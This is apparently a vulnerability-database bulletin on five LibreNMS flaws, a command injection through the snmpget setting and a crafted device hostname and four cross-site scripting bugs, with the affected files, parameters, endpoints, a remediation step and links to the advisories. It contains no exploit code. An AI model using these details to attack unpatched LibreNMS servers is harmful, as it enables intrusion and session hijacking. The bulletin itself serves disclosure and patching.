SB20241115151 - Multiple vulnerabilities in LibreNMS

Description

This security bulletin contains information about 5 secuirty vulnerabilities.

1) Command injection (CVE-ID: CVE-2024-51092)

The vulnerability allows a remote user to execute arbitrary code.

The vulnerability exists due to command injection in AboutController.php when processing the /about page with a poisoned snmpget configuration value. A remote user can modify configuration parameters and create a crafted device hostname to execute arbitrary code.

Exploitation requires chaining the ability to create a device with shell metacharacters in its hostname and to update the snmpget setting through the web portal.

2) Cross-site scripting (CVE-ID: CVE-2024-50351)

The vulnerability allows a remote user to execute arbitrary JavaScript in the context of a user's session.

The vulnerability exists due to improper neutralization of input during web page generation in the report_this() function and the device logs tab when handling the section parameter. A remote privileged user can send a specially crafted URL to execute arbitrary JavaScript in the context of a user's session.

User interaction is required to access the crafted page.

3) Cross-site scripting (CVE-ID: CVE-2024-51496)

The vulnerability allows a remote user to execute arbitrary JavaScript in a user's session.

The vulnerability exists due to cross-site scripting in the "metric" parameter of the /wireless and /health endpoints when handling requests containing a crafted metric parameter. A remote privileged user can send a specially crafted URL to execute arbitrary JavaScript in a user's session.

User interaction is required to access the crafted page.

4) Cross-site scripting (CVE-ID: CVE-2024-52526)

The vulnerability allows a remote user to execute arbitrary JavaScript in other users' sessions.

The vulnerability exists due to cross-site scripting in librenms/includes/html/pages/device/services.inc.php when handling the "descr" parameter in the device services editing workflow. A remote privileged user can submit a specially crafted service description to execute arbitrary JavaScript in other users' sessions.

User interaction is required when another user visits the device's "Services" tab, and the issue does not occur through the normal "Add Service" interface created through the ajax_form.php request with "type=create-service".

5) Cross-site scripting (CVE-ID: CVE-2024-50352)

The vulnerability allows a remote user to execute arbitrary JavaScript in other users' sessions.

The vulnerability exists due to improper neutralization of input during web page generation in the Services section of the Device Overview page when processing the "name" parameter during the device edit services workflow. A remote privileged user can submit a specially crafted service name to execute arbitrary JavaScript in other users' sessions.

User interaction is required when another user visits the device overview page, and the issue does not occur through the normal "Add Service" interface.

Remediation

Install update from vendor's website.

References

• https://github.com/librenms/librenms/security/advisories/GHSA-x645-6pf9-xwxw
• https://github.com/librenms/librenms/security/advisories/GHSA-v7w9-63xh-6r3w
• https://github.com/advisories/GHSA-v7w9-63xh-6r3w
• https://github.com/librenms/librenms/security/advisories/GHSA-28p7-f6h6-3jh3
• https://github.com/advisories/GHSA-28p7-f6h6-3jh3
• https://github.com/librenms/librenms/security/advisories/GHSA-8fh4-942r-jf2g
• https://github.com/librenms/librenms/security/advisories/GHSA-qr8f-5qqg-j3wg